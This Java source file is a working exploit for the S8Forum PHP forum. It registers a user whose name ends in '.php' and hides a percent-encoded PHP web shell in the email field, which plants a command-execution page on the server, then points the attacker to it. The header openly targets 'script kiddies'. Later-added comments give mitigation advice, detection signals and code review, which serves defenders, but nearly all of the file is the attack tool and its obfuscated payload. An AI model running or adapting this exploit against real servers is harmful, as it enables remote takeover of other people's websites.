import java.io.*; import java.net.*; import java.util.*; /** *

Title: s8Exploit

*

Description: Exploit for s8Forum

* @author [Franky]
* @version 1.0
* Product : S8Forum
* Website : http://www.kellishaver.com/
* Problem : A security vulnerability in S8Forum
* This bug was discovered by Nasser.M.Sh
*
* This forum is written in PHP. It doesn't use a database; instead
* it creates a new file with the name of the registered user and
* saves it in the (users) directory without an extension.
* The program doesn't check the user's entries, like user name, email, etc.
* This bug enables us to run some commands on the server.
*
* This program creates a php file that emulates a shell with the privileges of
* the web server.
* I've coded it in java because many script kiddies don't know jsdk and don't
* wanna download it to compile this program
*
* Compile instruction: javac s8Exploit.java
* Usage: java s8Exploit
*
* Defender's notes (from reading the code below, not from testing the product):
* the weakness this client relies on is server-side: the registration handler
* takes the submitted user name as a file name (here it ends in ".php") and
* writes other submitted fields (here the "email" field, carrying PHP source)
* into that file under a web-served directory. Mitigation belongs on the
* server: validate the user name against a strict allow-list (no dots, no
* slashes), never let client input choose a file name or extension, and keep
* user records outside the document root or in a location the web server
* will not execute. Detection signals visible from this client: a
* registration POST whose "uname" ends in ".php" or whose "email" value
* contains a PHP open tag, and a new ".php" file appearing under users/.
*/
public class s8Exploit {

    /**
     * Converts a hexadecimal string into the character with that numeric value.
     *
     * @param hex hexadecimal digits, e.g. {@code "3c"}
     * @return the char whose code is {@code hex} parsed in base 16 (truncated to 16 bits by the cast)
     * @throws NumberFormatException if {@code hex} is not valid base-16 text; no caller catches this
     */
    private static char hexDec(String hex){
        int i = Integer.valueOf(hex,16).intValue();
        // The Character wrapper round-trip is a no-op; only the (char) cast matters.
        char aChar = new Character((char)i).charValue();
        return aChar;
    }

    /**
     * Decodes a run of {@code %XX} escapes into the characters they stand for.
     *
     * <p>The input is split on {@code '%'} (empty tokens are dropped, so a leading
     * {@code '%'} is harmless) and every token is handed to {@link #hexDec} as hex.
     * Any literal text between escapes would therefore be parsed as hex too and
     * raise {@code NumberFormatException}; this is only safe for fully escaped input.
     *
     * @param sh percent-encoded text, every byte escaped
     * @return the decoded text
     */
    private static String shellEncode(String sh){
        StringTokenizer token = new StringTokenizer(sh,"%",false);
        String tkn = "";
        StringBuffer buff = new StringBuffer();
        while(token.hasMoreTokens()){
            tkn = token.nextToken();
            buff.append(hexDec(tkn));
        }
        return buff.toString();
    }

    /**
     * Produces a pseudo-random decimal string used as a file-name suffix.
     *
     * <p>{@code Math.abs(Integer.MIN_VALUE)} is still negative, so in that one
     * case the modulo yields a negative value; otherwise the result is in 0..100.
     * {@code java.util.Random} is not a cryptographic generator.
     *
     * @return the number as a String
     */
    private static String mkfile(){
        Random r = new Random();
        int randInt = Math.abs(r.nextInt()) % 101;
        return randInt + "";
    }

    /** Prints the program banner to stdout. */
    private static void banner(){
        System.out.println("");
        System.out.println("s8Forum V 3.0 Exploit by [Franky]");
        System.out.println("");
    }

    /** Prints the usage line and terminates the JVM with status 0. */
    private static void usage(){
        System.out.println("");
        System.out.println("Usage: java s8Exploit ");
        System.exit(0);
    }

    /**
     * Entry point: registers a user on the target forum whose record file carries
     * PHP source, then prints where that file is expected to appear.
     *
     * @param args {@code args[0]} host name, {@code args[1]} path prefix under which
     *             {@code register.php} lives; any other argument count prints usage and exits
     */
    public static void main(String[] args) {
        // Percent-encoded source of the PHP page that is submitted as the "email" field.
        // It is decoded by shellEncode and then re-encoded as a form value below.
        final String SHELLCODE = "%3c%3f%0d%0a%64%65%66%69%6e%65%28%27%50%48%50%53%48%" +
            "45%4c%4c%5f%56%45%52%53%49%4f%4e%27%2c%09%27%31%2e%37%" +
            "09%68%61%63%6b%65%64%27%29%3b%0d%0a%3f%3e%0d%0a%3c%68%" +
            "74%6d%6c%3e%0d%0a%3c%68%65%61%64%3e%0d%0a%3c%74%69%74%" +
            "6c%65%3e%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%2f%68%65%61%" +
            "64%3e%0d%0a%3c%62%6f%64%79%3e%0d%0a%3c%68%31%3e%50%48%" +
            "50%09%53%68%65%6c%6c%09%3c%3f%09%65%63%68%6f%09%50%48%" +
            "50%53%48%45%4c%4c%5f%56%45%52%53%49%4f%4e%09%3f%3e%3c%" +
            "2f%68%31%3e%0d%0a%3c%3f%0d%0a%69%66%09%28%69%6e%69%5f%" +
            "67%65%74%28%27%72%65%67%69%73%74%65%72%5f%67%6c%6f%62%" +
            "61%6c%73%27%29%09%21%3d%09%27%31%27%29%09%7b%0d%0a%09%" +
            "09%69%66%09%28%21%65%6d%70%74%79%28%24%48%54%54%50%5f%" +
            "50%4f%53%54%5f%56%41%52%53%29%29%0d%0a%09%09%09%09%65%" +
            "78%74%72%61%63%74%28%24%48%54%54%50%5f%50%4f%53%54%5f%" +
            "56%41%52%53%29%3b%0d%0a%09%09%69%66%09%28%21%65%6d%70%" +
            "74%79%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%29%" +
            "29%0d%0a%09%09%09%09%65%78%74%72%61%63%74%28%24%48%54%" +
            "54%50%5f%47%45%54%5f%56%41%52%53%29%3b%0d%0a%09%09%69%" +
            "66%09%28%21%65%6d%70%74%79%28%24%48%54%54%50%5f%53%45%" +
            "52%56%45%52%5f%56%41%52%53%29%29%0d%0a%09%09%09%09%65%" +
            "78%74%72%61%63%74%28%24%48%54%54%50%5f%53%45%52%56%45%" +
            "52%5f%56%41%52%53%29%3b%0d%0a%7d%0d%0a%3f%3e%0d%0a%3c%" +
            "66%6f%72%6d%09%6e%61%6d%65%3d%22%6d%79%66%6f%72%6d%22%" +
            "09%61%63%74%69%6f%6e%3d%22%3c%3f%09%65%63%68%6f%09%24%" +
            "50%48%50%5f%53%45%4c%46%09%3f%3e%22%09%6d%65%74%68%6f%" +
            "64%3d%22%70%6f%73%74%22%3e%0d%0a%3c%2f%62%3e%3c%2f%70%" +
            "3e%0d%0a%3c%70%3e%43%6f%6d%6d%61%6e%64%3a%09%3c%69%6e%" +
            "70%75%74%09%74%79%70%65%3d%22%74%65%78%74%22%09%6e%61%" +
            "6d%65%3d%22%63%6f%6d%6d%61%6e%64%22%09%73%69%7a%65%3d%" +
            "22%36%30%22%3e%0d%0a%3c%69%6e%70%75%74%09%6e%61%6d%65%" +
            "3d%22%73%75%62%6d%69%74%5f%62%74%6e%22%09%74%79%70%65%" +
            "3d%22%73%75%62%6d%69%74%22%09%76%61%6c%75%65%3d%22%45%" +
            "78%65%63%75%74%65%09%43%6f%6d%6d%61%6e%64%22%3e%3c%2f%" +
            "70%3e%0d%0a%3c%70%3e%45%6e%61%62%6c%65%09%3c%63%6f%64%" +
            "65%3e%73%74%64%65%72%72%3c%2f%63%6f%64%65%3e%2d%74%72%" +
            "61%70%70%69%6e%67%3f%09%3c%69%6e%70%75%74%09%74%79%70%" +
            "65%3d%22%63%68%65%63%6b%62%6f%78%22%09%6e%61%6d%65%3d%" +
            "22%73%74%64%65%72%72%22%3e%3c%2f%70%3e%0d%0a%3c%74%65%" +
            "78%74%61%72%65%61%09%63%6f%6c%73%3d%22%38%30%22%09%72%" +
            "6f%77%73%3d%22%32%30%22%09%72%65%61%64%6f%6e%6c%79%3e%" +
            "0d%0a%3c%3f%0d%0a%69%66%09%28%21%65%6d%70%74%79%28%24%" +
            "63%6f%6d%6d%61%6e%64%29%29%09%7b%0d%0a%09%09%69%66%09%" +
            "28%24%73%74%64%65%72%72%29%09%7b%0d%0a%09%09%09%09%24%" +
            "74%6d%70%66%69%6c%65%09%3d%09%74%65%6d%70%6e%61%6d%28%" +
            "27%2f%74%6d%70%27%2c%09%27%70%68%70%73%68%65%6c%6c%27%" +
            "29%3b%0d%0a%09%09%09%09%24%63%6f%6d%6d%61%6e%64%09%2e%" +
            "3d%09%22%09%31%3e%09%24%74%6d%70%66%69%6c%65%09%32%3e%" +
            "26%31%3b%09%22%09%2e%0d%0a%09%09%09%09%22%63%61%74%09%" +
            "24%74%6d%70%66%69%6c%65%3b%09%72%6d%09%24%74%6d%70%66%" +
            "69%6c%65%22%3b%0d%0a%09%09%7d%09%65%6c%73%65%09%69%66%" +
            "09%28%24%63%6f%6d%6d%61%6e%64%09%3d%3d%09%27%6c%73%27%" +
            "29%09%7b%0d%0a%09%09%09%09%24%63%6f%6d%6d%61%6e%64%09%" +
            "2e%3d%09%27%09%2d%46%27%3b%0d%0a%09%09%7d%0d%0a%09%09%" +
            "73%79%73%74%65%6d%28%24%63%6f%6d%6d%61%6e%64%29%3b%0d%" +
            "0a%7d%0d%0a%3f%3e%0d%0a%3c%2f%74%65%78%74%61%72%65%61%" +
            "3e%0d%0a%3c%2f%66%6f%72%6d%3e%0d%0a%3c%73%63%72%69%70%" +
            "74%09%6c%61%6e%67%75%61%67%65%3d%22%4a%61%76%61%53%63%" +
            "72%69%70%74%22%09%74%79%70%65%3d%22%74%65%78%74%2f%6a%" +
            "61%76%61%73%63%72%69%70%74%22%3e%0d%0a%64%6f%63%75%6d%" +
            "65%6e%74%2e%66%6f%72%6d%73%5b%30%5d%2e%63%6f%6d%6d%61%" +
            "6e%64%2e%66%6f%63%75%73%28%29%3b%0d%0a%3c%2f%73%63%72%" +
            "69%70%74%3e%0d%0a%3c%68%72%3e%0d%0a%3c%69%3e%43%6f%70%" +
            "79%72%69%67%68%74%09%26%63%6f%70%79%3b%09%32%30%30%30%" +
            "26%6e%64%61%73%68%3b%32%30%30%32%2c%09%3c%61%0d%0a%68%" +
            "72%65%66%3d%22%6d%61%69%6c%74%6f%3a%67%69%6d%70%73%74%" +
            "65%72%40%67%69%6d%70%73%74%65%72%2e%63%6f%6d%22%3e%4d%" +
            "61%72%74%69%6e%09%47%65%69%73%6c%65%72%3c%2f%61%3e%2e%" +
            "09%47%65%74%09%74%68%65%09%6c%61%74%65%73%74%0d%0a%76%" +
            "65%72%73%69%6f%6e%09%61%74%09%3c%61%09%68%72%65%66%3d%" +
            "22%68%74%74%70%3a%2f%2f%77%77%77%2e%67%69%6d%70%73%74%" +
            "65%72%2e%63%6f%6d%22%3e%77%77%77%2e%67%69%6d%70%73%74%" +
            "65%72%2e%63%6f%6d%3c%2f%61%3e%2e%3c%2f%69%3e%0d%0a%3c%" +
            "2f%62%6f%64%79%3e%0d%0a%3c%2f%68%74%6d%6c%3e%0d%0a";
        String hostname = "";
        String path = "";
        String tmp = "";
        int port = 80;
        banner();
        if (args.length != 2){
            usage();
        }
        hostname = args[0];
        path = args[1];
        try{
            System.out.println("Create remote socket...please wait...");
            // doOutput=true turns the URLConnection into an HTTP POST once the body is written.
            URL url = new URL("http://"+ hostname +":80"+ path + "/register.php");
            URLConnection conn = url.openConnection();
            conn.setDoOutput(true);
            // This Socket is opened but never read, written or closed: a leaked, unused
            // TCP connection (the real request goes through conn above). Note that it
            // produces a second connection from the client, visible in connection logs.
            InetAddress addr = InetAddress.getByName(hostname);
            Socket socket = new Socket(addr, port);
            System.out.println("CONNECT!");
            tmp = shellEncode(SHELLCODE);
            String shelldata = URLEncoder.encode(tmp,"UTF-8");
            String fpre = mkfile();
            // Registration form body. The user name carries a ".php" suffix and the
            // "email" field carries the decoded PHP page; per the class header the
            // server writes these unvalidated into users/<uname>. That missing
            // server-side validation is the defect, not anything in this client.
            String postdata = URLEncoder.encode("mode","UTF-8") + "=" + URLEncoder.encode("registration_confirm","UTF-8")+"&"+
                URLEncoder.encode("uname","UTF-8") + "=" + URLEncoder.encode("franky"+fpre+"code.php","UTF-8") + "&" +
                URLEncoder.encode("passwd","UTF-8") + "=" + URLEncoder.encode("franky"+fpre+"code.","UTF-8") + "&"+
                URLEncoder.encode("passwd1","UTF-8") + "=" + URLEncoder.encode("franky"+fpre+"code.","UTF-8") + "&"+
                URLEncoder.encode("email","UTF-8") + "=" + shelldata;
            System.out.println("Sending exploit...");
            // Platform default charset: no explicit encoding is passed to the writer.
            OutputStreamWriter wr = new OutputStreamWriter(conn.getOutputStream());
            wr.write(postdata);
            wr.flush();
            System.out.print("DONE!");
            BufferedReader rd = new BufferedReader(new InputStreamReader(conn.getInputStream()));
            String line;
            // Drains the response so the exchange completes; the body is discarded.
            while ((line = rd.readLine()) != null) {
                // System.out.println(line);
            }
            // The streams are closed only on the success path; an exception above leaks them.
            wr.close();
            rd.close();
            System.out.println("Ok, point your browser at http://"+hostname+path+"users/franky"+fpre+"code.php");
        }catch(UnknownHostException e){
            // UnknownHostException is a subclass of IOException, so it must be caught first.
            System.out.print("Exploit faild: Unknown host "+hostname);
            System.exit(1);
        }catch(IOException e){
            System.out.println("Exploit faild: IOException:" + e.toString());
            System.exit(1);
        }
    }
}